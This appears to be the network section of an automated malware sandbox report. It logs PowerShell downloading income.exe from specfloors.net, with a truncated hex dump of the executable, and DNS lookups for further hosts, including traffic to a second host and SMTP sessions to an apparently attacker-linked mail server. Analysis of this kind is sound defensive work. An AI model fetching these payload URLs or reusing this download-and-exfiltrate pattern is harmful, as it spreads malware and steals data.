                                                Mar 22, 2021 15:36:19.464204073 CET4916780192.168.2.22172.67.176.78
                                                Mar 22, 2021 15:36:19.464222908 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.464250088 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.464282990 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.464315891 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.464344025 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.464354992 CET4916780192.168.2.22172.67.176.78
                                                Mar 22, 2021 15:36:19.464386940 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.464416027 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.464430094 CET4916780192.168.2.22172.67.176.78
                                                Mar 22, 2021 15:36:19.464443922 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.464545012 CET4916780192.168.2.22172.67.176.78
                                                Mar 22, 2021 15:36:19.464698076 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.464720011 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.464781046 CET4916780192.168.2.22172.67.176.78
                                                Mar 22, 2021 15:36:19.464782953 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.464804888 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.464827061 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.464848995 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.464870930 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.464870930 CET4916780192.168.2.22172.67.176.78
                                                Mar 22, 2021 15:36:19.464884996 CET4916780192.168.2.22172.67.176.78
                                                Mar 22, 2021 15:36:19.464893103 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.464914083 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.464935064 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.464958906 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.464978933 CET4916780192.168.2.22172.67.176.78
                                                Mar 22, 2021 15:36:19.464982033 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.465003967 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.465024948 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.465034962 CET4916780192.168.2.22172.67.176.78
                                                Mar 22, 2021 15:36:19.465046883 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.465058088 CET4916780192.168.2.22172.67.176.78
                                                Mar 22, 2021 15:36:19.465066910 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.465085983 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.465101957 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.465106964 CET4916780192.168.2.22172.67.176.78
                                                Mar 22, 2021 15:36:19.465118885 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.465140104 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.465176105 CET4916780192.168.2.22172.67.176.78
                                                Mar 22, 2021 15:36:19.480987072 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.481126070 CET4916780192.168.2.22172.67.176.78
                                                Mar 22, 2021 15:36:19.481298923 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.481323004 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.481442928 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.481678009 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.481715918 CET4916780192.168.2.22172.67.176.78
                                                Mar 22, 2021 15:36:19.481725931 CET4916780192.168.2.22172.67.176.78
                                                Mar 22, 2021 15:36:19.481933117 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.482075930 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.482254982 CET4916780192.168.2.22172.67.176.78
                                                Mar 22, 2021 15:36:19.482316971 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.482336044 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.482381105 CET4916780192.168.2.22172.67.176.78
                                                Mar 22, 2021 15:36:19.494007111 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.494036913 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.494060040 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.494075060 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.494102001 CET4916780192.168.2.22172.67.176.78
                                                Mar 22, 2021 15:36:19.495342970 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.495363951 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.495379925 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.495419979 CET4916780192.168.2.22172.67.176.78
                                                Mar 22, 2021 15:36:19.495429039 CET4916780192.168.2.22172.67.176.78
                                                Mar 22, 2021 15:36:19.495470047 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.495487928 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.495502949 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.495517969 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.495580912 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.495600939 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.495616913 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.495640039 CET4916780192.168.2.22172.67.176.78
                                                Mar 22, 2021 15:36:19.495646954 CET4916780192.168.2.22172.67.176.78
                                                Mar 22, 2021 15:36:19.495827913 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.495851040 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.495874882 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.495959044 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.495981932 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.495997906 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.496009111 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.496017933 CET4916780192.168.2.22172.67.176.78
                                                Mar 22, 2021 15:36:19.496026039 CET4916780192.168.2.22172.67.176.78
                                                Mar 22, 2021 15:36:19.496608019 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.496630907 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.496634007 CET4916780192.168.2.22172.67.176.78
                                                Mar 22, 2021 15:36:19.496653080 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.496675968 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.496697903 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.496706963 CET4916780192.168.2.22172.67.176.78
                                                Mar 22, 2021 15:36:19.496711016 CET4916780192.168.2.22172.67.176.78
                                                Mar 22, 2021 15:36:19.496720076 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.496742964 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.496767044 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.496792078 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.496814013 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.496857882 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.496882915 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.496892929 CET4916780192.168.2.22172.67.176.78
                                                Mar 22, 2021 15:36:19.496896982 CET4916780192.168.2.22172.67.176.78
                                                Mar 22, 2021 15:36:19.496906996 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.496932030 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.496958017 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.496982098 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.497003078 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.497026920 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.497051001 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.497078896 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.497091055 CET4916780192.168.2.22172.67.176.78
                                                Mar 22, 2021 15:36:19.497093916 CET4916780192.168.2.22172.67.176.78
                                                Mar 22, 2021 15:36:19.497577906 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.497602940 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.497626066 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.497643948 CET4916780192.168.2.22172.67.176.78
                                                Mar 22, 2021 15:36:19.497649908 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.497675896 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.497699976 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.497721910 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.497745037 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.497756004 CET4916780192.168.2.22172.67.176.78
                                                Mar 22, 2021 15:36:19.497759104 CET4916780192.168.2.22172.67.176.78
                                                Mar 22, 2021 15:36:19.497769117 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.497791052 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.498359919 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.498402119 CET4916780192.168.2.22172.67.176.78
                                                Mar 22, 2021 15:36:19.498416901 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.498441935 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.498465061 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.498480082 CET4916780192.168.2.22172.67.176.78
                                                Mar 22, 2021 15:36:19.498491049 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.498522997 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.498549938 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.498574018 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.498593092 CET4916780192.168.2.22172.67.176.78
                                                Mar 22, 2021 15:36:19.498734951 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.498754025 CET4916780192.168.2.22172.67.176.78
                                                Mar 22, 2021 15:36:19.498925924 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.498967886 CET4916780192.168.2.22172.67.176.78
                                                Mar 22, 2021 15:36:19.501913071 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.501948118 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.501966000 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.501982927 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.501996994 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.502001047 CET4916780192.168.2.22172.67.176.78
                                                Mar 22, 2021 15:36:19.502013922 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.502029896 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.502032042 CET4916780192.168.2.22172.67.176.78
                                                Mar 22, 2021 15:36:19.502048016 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.502099037 CET4916780192.168.2.22172.67.176.78
                                                Mar 22, 2021 15:36:19.502106905 CET4916780192.168.2.22172.67.176.78
                                                Mar 22, 2021 15:36:19.508719921 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.508760929 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.508786917 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.508809090 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.508830070 CET4916780192.168.2.22172.67.176.78
                                                Mar 22, 2021 15:36:19.508832932 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.508857012 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.508881092 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.508891106 CET4916780192.168.2.22172.67.176.78
                                                Mar 22, 2021 15:36:19.508905888 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.508930922 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.508959055 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.509006023 CET4916780192.168.2.22172.67.176.78
                                                Mar 22, 2021 15:36:19.509011030 CET4916780192.168.2.22172.67.176.78
                                                Mar 22, 2021 15:36:19.509037971 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.509062052 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.509146929 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.509170055 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.509192944 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.509217978 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.509243011 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.509249926 CET4916780192.168.2.22172.67.176.78
                                                Mar 22, 2021 15:36:19.509255886 CET4916780192.168.2.22172.67.176.78
                                                Mar 22, 2021 15:36:19.509274006 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.509296894 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.509320974 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.509398937 CET4916780192.168.2.22172.67.176.78
                                                Mar 22, 2021 15:36:19.509406090 CET4916780192.168.2.22172.67.176.78
                                                Mar 22, 2021 15:36:19.510221958 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.510250092 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.510288000 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.510318041 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.510324001 CET4916780192.168.2.22172.67.176.78
                                                Mar 22, 2021 15:36:19.510341883 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.510370970 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.510397911 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.510421991 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.510425091 CET4916780192.168.2.22172.67.176.78
                                                Mar 22, 2021 15:36:19.510447025 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.510468960 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.511879921 CET4916780192.168.2.22172.67.176.78
                                                Mar 22, 2021 15:36:19.512619019 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.512706041 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.512728930 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.512747049 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.512763023 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.512773991 CET4916780192.168.2.22172.67.176.78
                                                Mar 22, 2021 15:36:19.512830973 CET4916780192.168.2.22172.67.176.78
                                                Mar 22, 2021 15:36:19.512836933 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.512861013 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.512877941 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.512897015 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.512913942 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.512945890 CET4916780192.168.2.22172.67.176.78
                                                Mar 22, 2021 15:36:19.512954950 CET4916780192.168.2.22172.67.176.78
                                                Mar 22, 2021 15:36:19.513099909 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.513122082 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.513139009 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.513154030 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.513156891 CET4916780192.168.2.22172.67.176.78
                                                Mar 22, 2021 15:36:19.513170004 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.513186932 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.513202906 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.513219118 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.513221979 CET4916780192.168.2.22172.67.176.78
                                                Mar 22, 2021 15:36:19.513225079 CET4916780192.168.2.22172.67.176.78
                                                Mar 22, 2021 15:36:19.513235092 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.513253927 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.513271093 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.513286114 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.513304949 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.513324976 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.513331890 CET4916780192.168.2.22172.67.176.78
                                                Mar 22, 2021 15:36:19.513335943 CET4916780192.168.2.22172.67.176.78
                                                Mar 22, 2021 15:36:19.513346910 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.513367891 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.513397932 CET4916780192.168.2.22172.67.176.78
                                                Mar 22, 2021 15:36:19.513400078 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.513431072 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.513451099 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.513451099 CET4916780192.168.2.22172.67.176.78
                                                Mar 22, 2021 15:36:19.513468027 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.513484001 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.513499975 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.513499975 CET4916780192.168.2.22172.67.176.78
                                                Mar 22, 2021 15:36:19.513520956 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.513540983 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.513561964 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.513577938 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.513596058 CET4916780192.168.2.22172.67.176.78
                                                Mar 22, 2021 15:36:19.513597965 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.513600111 CET4916780192.168.2.22172.67.176.78
                                                Mar 22, 2021 15:36:19.513617039 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.513725042 CET4916780192.168.2.22172.67.176.78
                                                Mar 22, 2021 15:36:19.513727903 CET4916780192.168.2.22172.67.176.78
                                                Mar 22, 2021 15:36:19.514204025 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.514225006 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:19.514261007 CET4916780192.168.2.22172.67.176.78
                                                Mar 22, 2021 15:36:29.946789980 CET4916780192.168.2.22172.67.176.78
                                                Mar 22, 2021 15:37:54.302213907 CET49168587192.168.2.22198.54.116.63
                                                Mar 22, 2021 15:37:54.493361950 CET58749168198.54.116.63192.168.2.22
                                                Mar 22, 2021 15:37:54.493446112 CET49168587192.168.2.22198.54.116.63
                                                Mar 22, 2021 15:37:54.724102974 CET58749168198.54.116.63192.168.2.22
                                                Mar 22, 2021 15:37:54.724512100 CET49168587192.168.2.22198.54.116.63
                                                Mar 22, 2021 15:37:54.916032076 CET58749168198.54.116.63192.168.2.22
                                                Mar 22, 2021 15:37:54.919426918 CET49168587192.168.2.22198.54.116.63
                                                Mar 22, 2021 15:37:55.110783100 CET58749168198.54.116.63192.168.2.22
                                                Mar 22, 2021 15:37:55.111222029 CET49168587192.168.2.22198.54.116.63
                                                Mar 22, 2021 15:37:55.313492060 CET58749168198.54.116.63192.168.2.22
                                                Mar 22, 2021 15:37:55.314274073 CET49168587192.168.2.22198.54.116.63
                                                Mar 22, 2021 15:37:55.505429983 CET58749168198.54.116.63192.168.2.22
                                                Mar 22, 2021 15:37:55.505986929 CET49168587192.168.2.22198.54.116.63
                                                Mar 22, 2021 15:37:55.701775074 CET58749168198.54.116.63192.168.2.22
                                                Mar 22, 2021 15:37:55.702084064 CET49168587192.168.2.22198.54.116.63
                                                Mar 22, 2021 15:37:55.892995119 CET58749168198.54.116.63192.168.2.22
                                                Mar 22, 2021 15:37:55.893100023 CET58749168198.54.116.63192.168.2.22
                                                Mar 22, 2021 15:37:55.895517111 CET49168587192.168.2.22198.54.116.63
                                                Mar 22, 2021 15:37:55.895804882 CET49168587192.168.2.22198.54.116.63
                                                Mar 22, 2021 15:37:55.896320105 CET49168587192.168.2.22198.54.116.63
                                                Mar 22, 2021 15:37:55.896496058 CET49168587192.168.2.22198.54.116.63
                                                Mar 22, 2021 15:37:55.896593094 CET49168587192.168.2.22198.54.116.63
                                                Mar 22, 2021 15:37:55.896673918 CET49168587192.168.2.22198.54.116.63
                                                Mar 22, 2021 15:37:55.896759033 CET49168587192.168.2.22198.54.116.63
                                                Mar 22, 2021 15:37:56.093157053 CET58749168198.54.116.63192.168.2.22
                                                Mar 22, 2021 15:37:56.093193054 CET58749168198.54.116.63192.168.2.22
                                                Mar 22, 2021 15:37:56.093209028 CET58749168198.54.116.63192.168.2.22
                                                Mar 22, 2021 15:37:56.096447945 CET58749168198.54.116.63192.168.2.22
                                                Mar 22, 2021 15:37:56.307418108 CET49168587192.168.2.22198.54.116.63
                                                Mar 22, 2021 15:40:41.094693899 CET58749168198.54.116.63192.168.2.22
                                                Mar 22, 2021 15:40:41.095805883 CET58749168198.54.116.63192.168.2.22
                                                Mar 22, 2021 15:40:41.095931053 CET49168587192.168.2.22198.54.116.63

                                                UDP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Mar 22, 2021 15:36:08.893560886 CET5219753192.168.2.228.8.8.8
                                                Mar 22, 2021 15:36:08.958956003 CET53521978.8.8.8192.168.2.22
                                                Mar 22, 2021 15:36:16.136372089 CET5309953192.168.2.228.8.8.8
                                                Mar 22, 2021 15:36:16.199054956 CET53530998.8.8.8192.168.2.22
                                                Mar 22, 2021 15:36:16.217905998 CET5283853192.168.2.228.8.8.8
                                                Mar 22, 2021 15:36:16.269005060 CET53528388.8.8.8192.168.2.22
                                                Mar 22, 2021 15:36:18.592609882 CET6120053192.168.2.228.8.8.8
                                                Mar 22, 2021 15:36:18.651133060 CET53612008.8.8.8192.168.2.22
                                                Mar 22, 2021 15:37:54.207794905 CET4954853192.168.2.228.8.8.8
                                                Mar 22, 2021 15:37:54.267529964 CET53495488.8.8.8192.168.2.22

                                                DNS Queries

                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                Mar 22, 2021 15:36:08.893560886 CET192.168.2.228.8.8.80xa4ceStandard query (0)specfloors.netA (IP address)IN (0x0001)
                                                Mar 22, 2021 15:36:18.592609882 CET192.168.2.228.8.8.80x71ddStandard query (0)liverpoolsupporters9.comA (IP address)IN (0x0001)
                                                Mar 22, 2021 15:37:54.207794905 CET192.168.2.228.8.8.80x80acStandard query (0)smtp.jiratane.comA (IP address)IN (0x0001)

                                                DNS Answers

                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                Mar 22, 2021 15:36:08.958956003 CET8.8.8.8192.168.2.220xa4ceNo error (0)specfloors.net107.180.99.252A (IP address)IN (0x0001)
                                                Mar 22, 2021 15:36:18.651133060 CET8.8.8.8192.168.2.220x71ddNo error (0)liverpoolsupporters9.com172.67.176.78A (IP address)IN (0x0001)
                                                Mar 22, 2021 15:36:18.651133060 CET8.8.8.8192.168.2.220x71ddNo error (0)liverpoolsupporters9.com104.21.88.100A (IP address)IN (0x0001)
                                                Mar 22, 2021 15:37:54.267529964 CET8.8.8.8192.168.2.220x80acNo error (0)smtp.jiratane.com198.54.116.63A (IP address)IN (0x0001)

                                                HTTP Request Dependency Graph

                                                • specfloors.net
                                                • liverpoolsupporters9.com

                                                HTTP Packets

                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                0192.168.2.2249165107.180.99.25280C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                TimestampkBytes transferredDirectionData
                                                Mar 22, 2021 15:36:09.113032103 CET0OUTGET /dev/income.exe HTTP/1.1
                                                Host: specfloors.net
                                                Connection: Keep-Alive
                                                Mar 22, 2021 15:36:09.564912081 CET0OUTGET /dev/income.exe HTTP/1.1
                                                Host: specfloors.net
                                                Connection: Keep-Alive
                                                Mar 22, 2021 15:36:09.678536892 CET2INHTTP/1.1 200 OK
                                                Date: Mon, 22 Mar 2021 14:36:09 GMT
                                                Server: Apache
                                                Upgrade: h2,h2c
                                                Connection: Upgrade, Keep-Alive
                                                Last-Modified: Mon, 22 Mar 2021 11:02:01 GMT
                                                ETag: "1e1614-11068-5be1dfec2aa31"
                                                Accept-Ranges: bytes
                                                Content-Length: 69736
                                                Vary: Accept-Encoding,User-Agent
                                                Keep-Alive: timeout=5
                                                Content-Type: application/x-msdownload
                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 9d 4e b7 9f 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 f2 00 00 00 08 00 00 00 00 00 00 4e 11 01 00 00 20 00 00 00 20 01 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 01 00 00 02 00 00 c4 f6 01 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 11 01 00 4b 00 00 00 00 20 01 00 f8 05 00 00 00 00 00 00 00 00 00 00 00 fc 00 00 68 14 00 00 00 40 01 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 54 f1 00 00 00 20 00 00 00 f2 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 f8 05 00 00 00 20 01 00 00 06 00 00 00 f4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 01 00 00 02 00 00 00 fa 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 11 01 00 00 00 00 00 48 00 00 00 02 00 05 00 a4 73 00 00 5c 9d 00 00 03 00 00 00 0c 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 2a 22 02 28 08 00 00 0a 00 2a 52 02 28 08 00 00 0a 00 00 02 